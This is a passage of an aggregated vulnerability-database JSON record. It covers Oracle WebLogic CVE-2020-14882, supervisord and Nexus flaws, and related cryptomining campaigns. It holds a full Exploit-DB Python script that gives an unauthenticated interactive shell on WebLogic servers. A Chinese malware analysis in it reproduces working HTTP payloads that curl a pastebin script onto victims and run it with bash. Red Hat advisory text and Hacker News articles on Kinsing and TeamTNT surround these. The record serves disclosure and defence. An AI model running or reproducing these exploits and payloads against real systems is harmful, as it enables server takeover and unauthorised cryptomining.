fail_with(Failure::UnexpectedReply, \"Unexpected HTTP code: #{res.code} response\")\r\n end\r\n else\r\n print_good('Request returned without status code, usually indicates success. Passing to handler..')\r\n handler\r\n end\r\n\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/raw/42779", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-09-20T17:18:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-14882", "CVE-2020-14882"], "modified": "2021-01-26T00:00:00", "id": "EDB-ID:49479", "href": "https://www.exploit-db.com/exploits/49479", "sourceData": "# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)\r\n# Google Dork: inurl:\"/console/login/LoginForm.jsp\"\r\n# Date: 01/26/2021\r\n# Exploit Author: CHackA0101\r\n# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html\r\n# Version: Oracle WebLogic Server, version 12.2.1.0\r\n# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)\r\n# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html\r\n# CVE : CVE-2020-14882\r\n\r\n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md\r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport argparse\r\nimport http.client\r\nhttp.client.HTTPConnection._http_vsn=10\r\nhttp.client.HTTPConnection._http_vsn_str='HTTP/1.0'\r\nparse=argparse.ArgumentParser()\r\nparse.add_argument('-u','--url',help='url')\r\nargs=parse.parse_args()\r\n\r\nproxies={'http':'127.0.0.1:8080'}\r\ncmd_=\"\"\r\n\r\n# Headers\r\nheaders = {\r\n\t\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0\",\r\n\t\"Accept\":\"application/json,text/plain,*/*\",\r\n\t\"Accept-Language\":\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\r\n\t\"Accept-Encoding\":\"gzip,deflate\",\r\n\t\"Upgrade-Insecure-Requests\":\"1\",\r\n\t\"Content-Type\":\"application/x-www-form-urlencoded\",\r\n\t\"Cache-Control\":\"max-age=0\",\r\n\t\"Connection\":\"close\"\r\n}\r\n\r\n# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:\r\nurl=args.url+\"\"\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec();\");\"\"\"\r\nurl_=args.url+\"/console/images/%252E%252E%252Fconsole.portal\"\r\n\r\nform_data_=\"\"\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread();\r\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\r\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\r\nfield.setAccessible(true);\r\nObject obj = field.get(adapter);\r\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\r\nString cmd = req.getHeader(\"cmd\");\r\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\",\"/c\", cmd} : new String[]{\"/bin/sh\",\"-c\", cmd};\r\nif (cmd != null) {\r\n String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\\\A\").next();\r\n weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);\r\n res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\r\n res.getServletOutputStream().flush();\r\n res.getWriter().write(\"\");}executeThread.interrupt();\");\"\"\"\r\n\r\n#data_ = parse.urlencode(form_data_)\r\nresults1=requests.get(url,headers=headers)\r\n\r\nif results1.status_code==200:\r\n\tprint(\"(Load Headers...)\\n\")\r\n\tprint(\"(Data urlencode...)\\n\")\r\n\tprint(\"(Execute exploit...)\\n\")\r\n\tprint(\"(CHackA0101-GNU/Linux)$ Successful Exploitation.\\n\")\r\n\twhile True:\r\n\t\tcmd_test = input(\"(CHackA0101GNU/Linux)$ \")\r\n\t\tif cmd_test==\"exit\":\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tcmd_ = cmd_test\r\n\t\t\t\theaders = {\r\n\t\t\t\t\t'cmd': cmd_,\r\n\t\t\t\t\t'Content-Type':'application/x-www-form-urlencoded',\r\n\t\t\t\t\t'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',\r\n\t\t\t\t\t'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\r\n\t\t\t\t\t'Connection':'close',\r\n\t\t\t\t\t'Accept-Encoding':'gzip,deflate',\r\n\t\t\t\t\t'Content-Length':'1244',\r\n\t\t\t\t\t'Content-Type':'application/x-www-form-urlencoded'\r\n\t\t\t\t}\r\n\t\t\t\tresults_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text\r\n\t\t\t\tprint(results_)\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\nelse:\r\n\tprint(\"(CHackA0101-GNU/Linux)$ Fail.\\n\")", "sourceHref": "https://www.exploit-db.com/raw/49479", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2023-09-12T04:37:38", "description": "Red Hat CloudForms Management Engine delivers the insight, control, and automation needed to address the challenges of managing virtual environments. CloudForms Management Engine is built on Ruby on Rails, a model-view-controller (MVC) framework for web application development. Action Pack implements the controller and the view components.\n\nThe following packages have been upgraded to a later upstream version: ansible-tower (3.1.5), cfme (5.8.2.3), cfme-appliance (5.8.2.3), cfme-gemset (5.8.2.3), rabbitmq-server (3.6.9), rh-ruby23-rubygem-nokogiri (1.8.1), supervisor (3.1.4). (BZ#1476286, BZ#1485484)\n\nSecurity Fix(es):\n\n* A flaw was found in Tower's interface with SCM repositories. If a Tower project (SCM repository) definition does not have the 'delete before update' flag set, an attacker with commit access to the upstream playbook source repository could create a Trojan playbook that, when executed by Tower, modifies the checked out SCM repository to add git hooks. These git hooks could, in turn, cause arbitrary command and code execution as the user Tower runs as. (CVE-2017-12148)\n\n* A vulnerability was found in the XML-RPC interface in supervisord. When processing malformed commands, an attacker can cause arbitrary shell commands to be executed on the server as the same user as supervisord. Exploitation requires the attacker to first be authenticated to the supervisord service. (CVE-2017-11610)\n\nThe CVE-2017-12148 issue was discovered by Ryan Petrello (Red Hat).\n\nAdditional Changes:\n\nThis update also fixes several bugs and adds various enhancements. Documentation for these changes is available from the Release Notes document linked to in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-24T00:00:47", "type": "redhat", "title": "(RHSA-2017:3005) Important: Red Hat CloudForms security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610", "CVE-2017-12148"], "modified": "2017-10-24T00:01:54", "id": "RHSA-2017:3005", "href": "https://access.redhat.com/errata/RHSA-2017:3005", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-12T17:49:56", "description": "Recently, Ali cloud security monitoring to watchbog mining Trojan use the new exposure of the Nexus Repository Manager 3 remote code execution vulnerability(CVE-2019-7238)for attack and mining the events. \nIt is worth noting that this attack Start Time 2 on 24th and 2 on 5 May above products, the parent company issued a vulnerability announcement separated by only more than half a month, once again confirms the\u201cvulnerability from exposure to the Black output is used for mining the time is growing short.\u201d In addition, the attacker also utilizes supervisord is restarted, the ThinkPHP products such as vulnerability to attack. \nThis article analyzed the Trojan's internal structure and mode of transmission, and on how to clean up, to prevent similar mining Trojan gives security recommendations. \nMining Trojan spread analysis \nAttacker major through the direct attack of the host service's vulnerability to Trojan propagation, which means that it does not currently have the worms contagious, this point is similar to 8220 gang. Even so, attacker still gets a lot of broiler chickens. \nIn particular, 2 on 24 May, the attack from the original attack only ThinkPHP and supervisord is restarted, to join the Nexus Repository Manager 3 the attack code, you can see the mining pool hash rate on the day that surged about 3-fold, reaching 210KH/s around earnings about $ 25/day, meaning that the highest may have 1 to 2 million hosts controlled mining\u3002 \n! [](/Article/UploadPic/2019-3/20193122279481.jpg) \nThe following is Ali Cloud Security to the acquisition of the 3 types of attack payload \n\uff081\uff09for the Nexus Repository Manager 3 remote code execution vulnerability(CVE-2019-7238)the use of \nPOST /service/extdirect HTTP/1.1 Host: \u3010victim_ip\u3011:8081X-Requested-With: XMLHttpRequestContent-Type: application/json {\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"233. class. forName('java. lang. Runtime'). getRuntime(). exec('curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"} \n\uff082\uff09for supervisord is restarted remote command execution vulnerability(CVE-2017-11610)the use of \nPOST /RPC2 HTTP/1.1 Host: \u3010victim_ip\u3011:9001Content-Type: application/x-www-form-urlencoded u0002u0002supervisor. supervisord is restarted. options. warnings. linecache. os. systemu0002 \nu0002 \nu0002curl https://pastebin.com/raw/zXcDajSs -o /tmp/babyu0002u0002u0002 \n\uff083\uff09for ThinkPHP remote command execution vulnerability exploit \nPOST /index. php? s=captcha HTTP/1.1 \nHost: \u3010victim_host\u3011 \nContent-Type: application/x-www-form-urlencoded \n\n_method=__construct&filter;[]=system&method;=get&server;[REQUEST_METHOD]=curl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby \nThe above three kinds of payload the purpose is the same, that is, the control of the host by executing the following command \ncurl-fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby \nTrojan functional structure analysis \n! [](/Article/UploadPic/2019-3/20193122271532.jpg) \nThe attacked host controlled access https://pastebin. com/raw/zXcDajSs, after repeated after the jump, you will get the following figure shows the shell script, which contains cronlow(), cronhigh(), flyaway()and other functions. \n! [](/Article/UploadPic/2019-3/20193122271895.jpg) \nAfter analyzing the results, the script mainly contains following several modules: \n1. Mining module \n! [](/Article/UploadPic/2019-3/20193122271914.jpg) \nMining module of the download()function, from https://ptpb. pw/D8r9 that$mi_64 the decoded content downloaded by the xmrig rewrite of the mining program, saved as/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc. service-g1g5qf/cred/fghhhh/data/watchbog, and from https://ptpb. pw/hgZI download the configuration file, and then start mining it. \nAnother function testa()is also similar, but it download the IS the xmr-stak mining program. \n2. Persistence module \nWill execute the malicious command is written to the/etc/cron. d/root and other file \n! [](/Article/UploadPic/2019-3/20193122271240.jpg) \n3. c&c;the module \nc&c;the module is mainly in the dragon()and flyaway()function is implemented. \n! [](/Article/UploadPic/2019-3/20193122272846.jpg) \nThe following figure shows the decoding after the dragon function \n! [](/Article/UploadPic/2019-3/20193122272974.jpg) \n\nIt will be followed by a request to https://pastebin. com/raw/05p0fTYd such as a plurality of addresses, and executes the received Command. Interestingly, these addresses are currently are stored in some common words, may be the Trojan author reserved for future use. \nflyaway()function and the dragon()is slightly different, it will start with the https://pixeldra. in/api/download/8iFEEg download/tmp/elavate it. \n\n! [](/Article/UploadPic/2019-3/20193122272758.jpg)\n\n**[1] [[2]](<93118_2.htm>) [next](<93118_2.htm>)**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-12T00:00:00", "type": "myhack58", "title": "Nexus Repository Manager 3 new vulnerability has been used in mining Trojan spread, users are advised to fix as soon as possible-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-7238", "CVE-2017-11610"], "modified": "2019-03-12T00:00:00", "id": "MYHACK58:62201993118", "href": "http://www.myhack58.com/Article/html/3/62/2019/93118.htm", "sourceData": "", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2023-05-31T16:21:21", "description": "[![Apache NiFi](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhDUoBIOWkWHTdL-b_c-RiXzt2DYzNR3SrlkUP7AEI4VkL-zsFLQI_OR3HPTcoECN1YA_cy_LgvVxd5dkMDtxDcHwiz2axDGQ8DlTK4piB4FyFJdsFInBZWhumL0MZGvQBtBhI7VLZDJjVeUE3A75apqjx5SDsfduake8zwaoUmeEO0b8SExNXMmXYZ/s728-e365/apachenifi.jpg>)\n\nA financially motivated threat actor is actively scouring the internet for unprotected [Apache NiFi instances](<https://nifi.apache.org/>) to covertly install a cryptocurrency miner and facilitate lateral movement.\n\nThe findings come from the SANS Internet Storm Center (ISC), which detected a spike in HTTP requests for \"/nifi\" on May 19, 2023.\n\n\"Persistence is achieved via timed processors or entries to cron,\" [said](<https://isc.sans.edu/diary/Your%20Business%20Data%20and%20Machine%20Learning%20at%20Risk%3A%20Attacks%20Against%20Apache%20NiFi/29900>) Dr. Johannes Ullrich, dean of research for SANS Technology Institute. \"The attack script is not saved to the system. The attack scripts are kept in memory only.\"\n\nA honeypot setup allowed the ISC to determine that the initial foothold is weaponized to drop a shell script that removes the \"/var/log/syslog\" file, disables the firewall, and terminates competing crypto-mining tools, before downloading and launching the Kinsing malware from a remote server.\n\nIt's worth pointing out that [Kinsing](<https://www.akamai.com/blog/security/Kinsing-evolves-adds-windows-to-attack-list>) has a [track record](<https://www.akamai.com/blog/security-research/atlassian-confluence-vulnerability-observations>) of [leveraging](<https://thehackernews.com/2023/01/kinsing-cryptojacking-hits-kubernetes.html>) publicly disclosed vulnerabilities in publicly accessible web applications to carry out its attacks.\n\nIn September 2022, Trend Micro detailed an [identical attack chain](<https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html>) that utilized old Oracle WebLogic Server flaws (CVE-2020-14882 and CVE-2020-14883) to deliver the cryptocurrency mining malware.\n\nUPCOMING WEBINAR\n\nZero Trust + Deception: Learn How to Outsmart Attackers!\n\nDiscover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!\n\n[Save My Seat!](<https://thn.news/z-inside-2>)\n\nSelect attacks mounted by the same threat actor against exposed NiFi servers also entail the execution of a second shell script that's designed to collect SSH keys from the infected host to connect to other systems within the victim's organization.\n\nA notable indicator of the ongoing campaign is that the actual attack and scanning activities are carried out via the IP address 109.207.200[.]43 against port 8080 and port 8443/TCP.\n\n\"Due to its use as a data processing platform, NiFi servers often have access to business-critical data,\" SANS ISC said. \"NiFi servers are likely attractive targets as they are configured with larger CPUs to support data transformation tasks. The attack is trivial if the [NiFi server is not secured](<https://nifi.apache.org/docs/nifi-docs/html/administration-guide.html#user_authentication>).\"\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-31T15:44:00", "type": "thn", "title": "Cybercriminals Targeting Apache NiFi Instances for Cryptocurrency Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2020-14883"], "modified": "2023-05-31T15:44:26", "id": "THN:80B476657ABE12ED91DD0E314BF8DA31", "href": "https://thehackernews.com/2023/05/cybercriminals-targeting-apache-nifi.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-16T15:26:53", "description": "[![Mining Cryptocurrencies](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1sRBo_ZY7HgvKOAmX48Fm2WVmdgzaxlpLKjWJdIbcDmSPoMhKNRnvoEzs1CeLQfriVUkngqRhLj6-9awHtv_DcqbKgRbmXo_M_03xicrkKz34GxB6Z68bL51GfJszPQZSm7wdORW1UR-5UcTEgmW2YZ3RvbgUdobA9TKfRbeoXpG1vtvq1S-yeEcf/s728-e1000/crypto-mining.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh1sRBo_ZY7HgvKOAmX48Fm2WVmdgzaxlpLKjWJdIbcDmSPoMhKNRnvoEzs1CeLQfriVUkngqRhLj6-9awHtv_DcqbKgRbmXo_M_03xicrkKz34GxB6Z68bL51GfJszPQZSm7wdORW1UR-5UcTEgmW2YZ3RvbgUdobA9TKfRbeoXpG1vtvq1S-yeEcf/s728-e100/crypto-mining.jpg>)\n\nMalicious actors such as Kinsing are taking advantage of both recently disclosed and older security flaws in Oracle WebLogic Server to deliver cryptocurrency-mining malware.\n\nCybersecurity company Trend Micro said it [found](<https://www.trendmicro.com/en_us/research/22/i/a-post-exploitation-look-at-coinminers-abusing-weblogic-vulnerab.html>) the financially-motivated group leveraging the vulnerability to drop Python scripts with capabilities to disable operating system (OS) security features such as Security-Enhanced Linux ([SELinux](<https://www.redhat.com/en/topics/linux/what-is-selinux>)), and others.\n\nThe operators behind the [Kinsing malware](<https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces>) have a history of scanning for vulnerable servers to co-opt them into a botnet, including that of [Redis](<https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html>), [SaltStack](<https://redcanary.com/blog/kinsing-malware-citrix-saltstack/>), [Log4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), [Spring4Shell](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>), and the Atlassian Confluence flaw ([CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>)).\n\nThe Kinsing actors have also been involved in campaigns against container environments via [misconfigured open Docker Daemon API ports](<https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability>) to launch a crypto miner and subsequently spread the malware to other containers and hosts.\n\nThe latest wave of attacks entails the actor weaponizing [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (CVSS score: 9.8), a two-year-old remote code execution (RCE) bug, against unpatched servers to seize control of the server and drop malicious payloads.\n\nIt's worth noting that the vulnerability has been [exploited in the past](<https://thehackernews.com/2020/12/multiple-botnets-exploiting-critical.html>) by multiple botnets to distribute Monero miners and the Tsunami backdoor on infected Linux systems. \n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh-utvgKxe36MyxmW2adubFVWxVKr-1Z4nJnB9nCLoIz72PJGF2D8Ti92uYdI0q1Y-KNK6paKazaUlHWRQZziPwY5119ANOJMXqaoGe4zOQOvqeEL1KkDD0Ed6TPx0FMjstH-f-8Sk0X--OysqaQnanHwm4INx3STYgUBwVWAo4Jzx5tnTWbKUt7EO4/s728-e100/hack.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh-utvgKxe36MyxmW2adubFVWxVKr-1Z4nJnB9nCLoIz72PJGF2D8Ti92uYdI0q1Y-KNK6paKazaUlHWRQZziPwY5119ANOJMXqaoGe4zOQOvqeEL1KkDD0Ed6TPx0FMjstH-f-8Sk0X--OysqaQnanHwm4INx3STYgUBwVWAo4Jzx5tnTWbKUt7EO4/s728-e100/hack.jpg>)\n\nSuccessful exploitation of the flaw was succeeded by the deployment of a shell script that's responsible for a series of actions: Removing the [/var/log/syslog](<https://help.ubuntu.com/community/LinuxLogFiles>) system log, turning off security features and cloud service agents from Alibaba and Tencent, and killing competing miner processes.\n\nThe shell script then proceeds to download the Kinsing malware from a remote server, while also taking steps to ensure persistence by means of cron job.\n\n\"The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems,\" Trend Micro said. \"This can range from malware execution [...] to theft of critical data, and even complete control of a compromised machine.\"\n\n## **TeamTNT actors make a comeback with new attacks**\n\nThe development comes as researchers from Aqua Security identified three new attacks linked to another \"vibrant\" cryptojacking group called TeamTNT, which voluntarily shut shop in November 2021.\n\n\"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server,\" Aqua Security researcher Assaf Morag [said](<https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt>).\n\nWhat's notable about the attack chain is that it appears to be designed to break [SECP256K1 encryption](<https://en.bitcoin.it/wiki/Secp256k1>), which, if successful, could give the actor the ability to calculate the keys to any cryptocurrency wallet. Put differently, the idea is to leverage the high but illegal computational power of its targets to run the ECDLP solver and get the key.\n\nTwo other attacks mounted by the group entail the exploitation of [exposed Redis servers](<https://blog.aquasec.com/container-attacks-on-redis-servers>) and misconfigured Docker APIs to deploy coin miners and Tsunami binaries.\n\nTeamTNT's targeting of Docker REST APIs has been [well-documented](<https://thehackernews.com/2021/12/ongoing-autom-cryptomining-malware.html>) over the past year. But in an [operational security blunder](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>) spotted by Trend Micro, credentials associated with two of the attacker-controlled DockerHub accounts have been uncovered.\n\n[![](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi0IY0nHIYVyoplfjBcUxHe2UQ8HJC-CQsXJZNKOFuXC17C5Qr6a4wRSM0arKFfc-z29j61GI_am83TJutj7s1RlsF0UQx0uq8dvuNfezG7wqD3PYDPqFHBO8m7qopVHCWrgR4GYVjM8c_OlyO6Fl0eUcrIcwH9vV7RwxB2-SpZb-AiOpx65Z7kdB1W/s728-e100/cyber.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEi0IY0nHIYVyoplfjBcUxHe2UQ8HJC-CQsXJZNKOFuXC17C5Qr6a4wRSM0arKFfc-z29j61GI_am83TJutj7s1RlsF0UQx0uq8dvuNfezG7wqD3PYDPqFHBO8m7qopVHCWrgR4GYVjM8c_OlyO6Fl0eUcrIcwH9vV7RwxB2-SpZb-AiOpx65Z7kdB1W/s728-e100/cyber.jpg>)\n\nThe accounts \u2013 alpineos and sandeep078 \u2013 are said to have been used to distribute a variety of malicious payloads like rootkits, Kubernetes exploit kits, credential stealers, XMRig Monero miners, and even the Kinsing malware.\n\n\"The account alpineos was used in exploitation attempts on our honeypots three times, from mid-September to early October 2021, and we tracked the deployments' IP addresses to their location in Germany,\" Trend Micro's Nitesh Surana [said](<https://www.trendmicro.com/en_us/research/22/i/security-breaks-teamtnts-dockerhub-credentials-leak.html>).\n\n\"The threat actors were logged in to their accounts on the DockerHub registry and probably forgot to log out.\" Alternatively, \"the threat actors logged in to their DockerHub account using the credentials of alpineos.\"\n\nTrend Micro said the malicious alpineos image had been downloaded more than 150,000 times, adding it notified Docker about these accounts. \n\nIt's also recommending organizations to configure the exposed REST API with TLS to mitigate adversary-in-the-middle (AiTM) attacks, as well as use credential stores and [helpers](<https://github.com/docker/docker-credential-helpers>) to host user credentials.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-16T10:58:00", "type": "thn", "title": "Hackers Targeting WebLogic Servers and Docker APIs for Mining Cryptocurrencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14882", "CVE-2022-26134"], "modified": "2022-09-16T15:00:46", "id": "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "href": "https://thehackernews.com/2022/09/hackers-targeting-weblogic-servers-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:43", "description": 